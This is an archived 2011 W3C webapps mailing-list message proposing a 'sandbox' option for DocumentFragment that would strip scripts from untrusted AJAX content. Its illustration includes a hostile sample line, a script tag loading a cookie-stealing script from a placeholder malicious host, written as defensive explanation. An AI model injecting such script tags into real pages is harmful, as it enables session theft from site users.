- From: Ryan Seddon <seddon.ryan@gmail.com>
- Date: Tue, 8 Nov 2011 15:23:50 +1100
- To: Ojan Vafai <ojan@chromium.org>
- Cc: Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
Received on Tuesday, 8 November 2011 04:24:48 UTC
On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote: > I don't really follow. Script won't execute until you append the fragment > to the DOM, at which point the fragment itself doesn't go in the DOM, just > it's children. So, I'm not really sure what sandboxing on fragments would > do. If I was ajaxing in potentially hostile content that had malicious script tags in it it would be ideal to "sandbox" the content so the HTML parser in the browser would strip the content for me. xhr.responseText = "<div><script src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>"; var frag = document.createDocumentFragment(); frag.sandbox = ""; frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will be stripped by the parser. document.body.appendChild(frag); The following article demonstrates the same concept using an iframe with the sandbox attribute set[1]. This to me would also make sense to be extended to fragments. [1] http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices -Ryan
Received on Tuesday, 8 November 2011 04:24:48 UTC